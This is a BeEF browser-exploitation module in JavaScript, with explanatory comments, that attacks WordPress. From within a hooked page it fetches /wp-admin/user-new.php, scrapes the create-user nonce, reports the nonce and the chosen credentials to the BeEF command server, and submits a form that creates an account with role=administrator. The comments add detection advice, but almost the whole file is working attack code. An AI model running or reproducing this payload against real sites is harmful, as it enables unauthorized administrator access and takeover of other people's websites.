//
// Copyright (c) 2015 Daniel Reece - @HBRN8
//
beef.execute(function() {
// Module body, executed inside a page the BeEF server has hooked.
// Every request path below is relative, so it resolves against the hooked
// page's own origin: the module presumes the hooked page is served by the
// WordPress site itself and that the browser already holds a session that is
// allowed to reach /wp-admin/user-new.php (neither is checked here).
//
// Defender notes: the visible sequence is (1) GET the new-user page,
// (2) scrape the create-user nonce out of its HTML, (3) replay that nonce in a
// POST that creates an account with role=administrator. The nonce does not
// help once script is already running in the wp-admin origin, because the
// script reads the nonce from the same origin; the effective control is
// keeping untrusted script out of that origin (XSS in themes/plugins, or a
// hooked page loaded while logged in). On the detection side, look for POSTs
// to user-new.php that create an administrator, and for administrator
// accounts that no real admin remembers creating.

// Synchronous GET (third open() argument is false); returns the body.
// `x` is assigned without var, so it is an implicit global shared with p().
function g(u){ x=new XMLHttpRequest(); x.open('GET',u,false); x.send(null); return x.responseText; }
// Asynchronous form-encoded POST. Because the request is async, responseText
// is read right after send() and will normally still be empty; the single
// caller below discards the return value anyway.
function p(u, b){ x=new XMLHttpRequest(); x.open('POST',u,true); x.setRequestHeader("Content-type","application/x-www-form-urlencoded"); x.send(b); return x.responseText; }
/* Kept in case there is a valid reason to use forms over AJAX; I can't think of any.
function post(path, params, method) {
method = method || "post";
var form = document.createElement("form");
form.setAttribute("method", method);
form.setAttribute("action", path);

for(var key in params) {
if(params.hasOwnProperty(key)) {
var hiddenField = document.createElement("input");
hiddenField.setAttribute("type", "hidden");
hiddenField.setAttribute("name", key);
hiddenField.setAttribute("value", params[key]);
form.appendChild(hiddenField);
}
}
document.body.appendChild(form);
form.submit();
}
*/

// `<%= ... %>` / `<%== ... %>` are server-side template tags: @domail,
// @command_url, @command_id and the account fields are substituted by the
// BeEF server before this script is delivered to the browser.
var domail = '<%= @domail %>';

// Fetch the new-user page in the victim's session. `page` and `m` below are
// implicit globals as well.
page = g("/wp-admin/user-new.php");

// Capture the value of the hidden input whose name ends in "-user" — the
// create-user nonce that is replayed as _wpnonce_create-user below.
// If nothing matches, `m` is null and the m[1] reference that follows throws.
m = page.match(/\-user" value="(.*?)" \/><input/);

// Report the captured nonce and the credentials being created back to the
// BeEF server via its command channel.
beef.net.send("<%= @command_url %>", <%= @command_id %>, "CSRF nonce hijacked = " + m[1] +
"\nCreating admin... (<%== format_multiline(@user + ':' + @pass) %>)");

// Body of the create-user form. _wp_http_referer is fixed to the user-new.php
// path; the remaining fields come straight from the server-side template.
var blob = "action=createuser" +
"&_wpnonce_create-user=" + m[1] +
"&_wp_http_referer=%2Fwp-admin%2Fuser-new.php" +
"&user_login=<%== format_multiline(@user) %>" +
"&email=<%== format_multiline(@email) %>" +
"&first_name=<%== format_multiline(@fname) %>" +
"&last_name=<%== format_multiline(@lname) %>" +
"&url=<%== format_multiline(@url) %>" +
"&pass1=<%== format_multiline(@pass) %>" +
"&pass2=<%== format_multiline(@pass) %>";
if (domail){
// WordPress sends the notification mail whenever the parameter is present,
// whatever its value, so it is only appended when @domail is set.
blob = blob + "&send_password=1";
}
// role=administrator is what turns the new account into an admin.
blob = blob + "&role=administrator&createuser=Add+New+User";

// Submit the form; the response is not inspected.
p("/wp-admin/user-new.php", blob);

/* Still can't think of any.
post('/wp-admin/user-new.php',
{action: 'createuser',
'_wpnonce_create-user': m[1],
_wp_http_referer: '%2Fwp-admin%2Fuser-new.php',
user_login: '<%== format_multiline(@user) %>',
email: '<%== format_multiline(@email) %>',
first_name: '<%== format_multiline(@fname) %>',
last_name: '<%== format_multiline(@lname) %>',
url: '<%== format_multiline(@url) %>',
pass1: '<%== format_multiline(@pass) %>',
pass2: '<%== format_multiline(@pass) %>',
send_password: '1',
role: 'administrator',
createuser: 'Add+New+User+'});
*/

});